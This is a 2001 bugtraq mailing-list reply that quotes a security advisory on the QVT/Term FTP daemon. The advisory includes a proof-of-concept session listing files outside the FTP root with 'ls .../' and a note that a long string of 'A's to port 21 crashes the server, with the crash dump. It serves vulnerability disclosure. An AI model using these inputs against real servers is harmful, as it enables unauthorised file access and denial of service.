Hello joetesta, This vulnerability was reported to bugtraq on April, 14 for both QVT/Term and QVT/Net 4.3 and 5.0 by SNS (Strumpf Noir Society) Research. --Wednesday, September 26, 2001, 8:13:17 AM, you wrote to bugtraq@securityfocus.com: jhc> -----BEGIN PGP SIGNED MESSAGE----- jhc> Vulnerabilities in QVT/Term jhc> Overview jhc> QVT/Term v5.0 is a suite of Internet tools available from http://www.qpc.com/. Two jhc> vulnerabilities exist in the FTP daemon. The first allows a remote user to list the files jhc> outside the ftp root. The second allows a remote user to crash the server. jhc> Details jhc> The following excerpt demonstrates the file listing problem; an ftp root of 'C:\root\root\' jhc> was used: >> ftp localhost jhc> Connected to xxxxxxxxx.rh.rit.edu. jhc> 220 xxxxxxxxx FTP server (QVT/Net 4.3) ready. jhc> User (xxxxxxxxx.rh.rit.edu:(none)): anonymous jhc> 331 Guest login OK, please send real ident as password. jhc> Password: jhc> 230 Guest login OK, access restrictions apply. ftp>> ls ../ jhc> 200 PORT command successful. jhc> 150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes). jhc> root jhc> 226 Transfer complete. jhc> ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec. ftp>> ls .../ jhc> [file listing of C:\ is shown here] jhc> 226 Transfer complete. jhc> ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec. ftp>> jhc> The following is the crash dump that results when a remote user connects to port 21 and jhc> sends a long stream of 'A's (~700+): jhc> FTPD caused an invalid page fault in jhc> module FTPD.EXE at 017f:00404b34. jhc> Registers: jhc> EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213 jhc> EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58 jhc> ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7 jhc> EDX=006699a5 ES=0187 EDI=00669ffd GS=0000 jhc> Bytes at CS:EIP: jhc> f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b jhc> Stack dump: jhc> 00000004 00771b90 00666a58 0064fbc0 jhc> 0000060a 12948ae8 00771b90 004105a0 jhc> 00288b30 bff728a2 0187bff7 bff713e2 jhc> 12948b04 0a2c175f 12990002 00288b4c jhc> Solution jhc> No quick fix is possible. jhc> Vendor Status jhc> QPC Software was contacted via <support@qpc.com> on Tuesday, September 18, 2001. No reply jhc> was received. jhc> - Joe Testa jhc> e-mail: joetesta@hushmail.com jhc> web page: http://hogs.rit.edu/~joet/ jhc> AIM: LordSpankatron jhc> -----BEGIN PGP SIGNATURE----- jhc> Version: Hush 2.0 jhc> wl0EARECAB0FAjuxgKkWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNAPK jhc> AJ9wTSs45AV9UKruT/Hikdomqu0IWgCfbDSqFhwDBqLJYqKimvXMV20hPmc= jhc> =xAvj jhc> -----END PGP SIGNATURE----- -- ~/3APA3A Почтенные ископаемые! Жду от вас дальнейших писем. (Твен)